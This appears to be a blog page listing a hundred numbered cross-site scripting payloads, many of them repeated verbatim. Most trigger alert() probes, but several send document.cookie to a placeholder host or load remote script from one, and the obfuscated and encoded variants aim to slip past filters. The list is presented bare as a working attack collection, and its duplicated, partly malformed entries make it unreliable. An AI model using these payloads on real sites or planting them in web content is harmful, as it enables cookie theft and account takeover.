Top 100 Cross Site Scripting(XSS) Payloads

1. <script>alert('XSS')</script>
2. <img src="javascript:alert('XSS');">
3. <svg/onload=alert('XSS')>
4. <body onload=alert('XSS')>
5. <img src=x onerror=alert('XSS')>
6. <input type="text" value="``onmouseover=alert('XSS')">
7. <a onmouseover="alert('XSS')">link</a>
8. <div style="xg-p:expression(alert('XSS'))">
9. <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=">
10. <iframe src="javascript:alert('XSS');">
11. <a href="javascript:alert('XSS');">Link</a>
12. <embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=">
13. <script>document.location='http://www.example.com/XSS.php?xss='+encodeURIComponent(document.cookie)</script>
14. <script src="http://www.example.com/XSS.js"></script>
15. <img src="http://www.example.com/XSS.jpg" onerror="alert('XSS')" />
16. <iframe src="http://www.example.com/XSS.html"></iframe>
17. <b onmouseover="alert('XSS')">bold</b>
18. <div onmouseover="alert('XSS')">text</div>
19. <img src="http://www.example.com/xss.png" onmouseover="alert('XSS')" />
20. <input autofocus onfocus=alert('XSS')>
21. <video><source onerror="alert('XSS')">
22. <isindex type=image src="javascript:alert('XSS')">
23. <a onmouseover=alert('XSS')>link</a>
24. <script>document.getElementById('xss').innerHTML='<script>alert('XSS')</script>'</script>
25. <iframe src=# onmouseover="alert('XSS')">
26. '><script>alert('XSS')</script>
27. ';alert('XSS');var foo='
28. <script>a=/XSS/
alert(a.source)</script>
29. <script>alert('XSS');</script>
30. <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
31. <body onload=alert('XSS')>
32. <img src="javascript:alert('XSS');">
33. <svg/onload=alert('XSS')>
34. <input type="text" value="``onmouseover=alert('XSS')">
35. <a onmouseover="alert('XSS')">link</a>
36. <div style="xg-p:expression(alert('XSS'))">
37. <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=">
38. <iframe src="javascript:alert('XSS');">
39. <a href="javascript:alert('XSS');">Link</a>
40. <embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=">
41. <script>document.location='http://www.example.com/XSS.php?xss='+encodeURIComponent(document.cookie)</script>
42. <script src="http://www.example.com/XSS.js"></script>
43. <img src="http://www.example.com/XSS.jpg" onerror="alert('XSS')" />
44. <iframe src="http://www.example.com/XSS.html"></iframe>
45. <b onmouseover="alert('XSS')">bold</b>
46. <div onmouseover="alert('XSS')">text</div>
47. <img src="http://www.example.com/xss.png" onmouseover="alert('XSS')" />
48. <input autofocus onfocus=alert('XSS')>
49. <video><source onerror="alert('XSS')">
50. <isindex type=image src="javascript:alert('XSS')">
51. <a onmouseover=alert('XSS')>link</a>
52. <script>document.getElementById('xss').innerHTML='<script>alert('XSS')</script>'</script>
53. <iframe src=# onmouseover="alert('XSS')">
54. '><script>alert('XSS')</script>
55. ';alert('XSS');var foo='
56. <script>a=/XSS/
alert(a.source)</script>
57. <script>alert('XSS');</script>
58. <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
59. “><sCript>alert(‘XSS’)</sCript>
60. <img/src='http://url.to.file.which/not.exist' onerror=alert(document.cookie)
61. <svg><script>alert&#40;1&#41; {Opera}
62. <img src=`xx:xx`onerror=alert(1)>
63. <object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ ">
64. <input type="text" value=`` <div/onmouseover='alert(1)'>X</div>
65. <iframe/src="data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
66. <img/src=`%00` onerror=alert(1)>
67. <script/src="data:text/javascript,alert(1)"></script a>
68. <iframe src="javascript:alert('XSS')"
69. "><script>alert('XSS')</script>
70. <svg><script>alert("XSS")</script>
71. <img src=x onerror="alert('XSS')">
72. <input type="text" value=``<div/onmouseover='alert(1)'>X</div>
73. <iframe/src="data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
74. <img/src=`%00` onerror=alert(1)>
75. <script/src="data:text/javascript,alert(1)"></script a>
76. <iframe src="javascript:alert('XSS')"
77. "><script>alert('XSS')</script>
78. <svg><script>alert("XSS")</script>
79. <img src=x onerror="alert('XSS')">
80. <a href="data:text/html;base64_,<script>alert('XSS')</script>">XSS</a>
81. <embed src="javascript:alert('XSS');">
82. <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
83. <script>document.write("<script>alert('XSS')</script>")</script>
84. <script>alert(String.fromCharCode(88,83,83))</script>
85. <img src=x onerror="alert(String.fromCharCode(88,83,83))">
86. <img src=x onerror=alert(/XSS/.source)>
87. <iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;:/&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;/&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;(1)>
88. <svg><script>//&NewLine;confirm(1);</script </svg>
89. <img src="/" =_=" title="onerror='prompt(1)'">
90. <form><a href="javascript:\u0061lert&#x28;1&#x29;">X
91. <a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click
92. <svg><style>&#111;&#110;&#45;&#101;&#109;&#111;&#116;&#105;&#111;&#110;&#58;&#97;&#108;&#101;&#114;&#116&#40;1&#41;</style>
93. <math><a xlink:href="//jsfiddle.net/t846h/">click
94. <object data="data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+"></object>
95. <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
96. <img src="http://url.to.file.which/not.exist" onerror=alert(document.cookie);>
97. <embed src="javascript:alert('XSS');"></embed>
98. <img src="http://www.mysite.com/image.jpg" onerror="alert('XSS')">
99. <script>document.write("<script>alert('XSS')</script>")</script>
100. <script>alert(String.fromCharCode(88,83,83))</script>

Leave a Reply